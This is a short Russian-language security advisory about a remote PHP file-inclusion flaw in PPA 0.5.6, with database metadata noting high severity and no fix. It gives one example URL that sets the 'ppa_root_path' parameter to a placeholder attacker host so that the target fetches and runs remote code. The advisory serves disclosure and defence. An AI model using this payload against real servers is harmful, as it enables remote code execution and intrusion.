PHP-инклюдинг в PPA

Дата публикации:
12.07.2005
Всего просмотров:
16665
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: PPA 0.5.6

Описание:
Обнаруженная уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре 'ppa_root_path' в сценарии 'inc/functions.inc.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе. Пример:

http://[path-to-ppa]/inc/functions.inc.php?config[ppa_root_path]=http://[attacker]

URL производителя: www.ppa.baiz.org/ppa/index.php

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: ppa remote file inclusion

или введите имя

CAPTCHA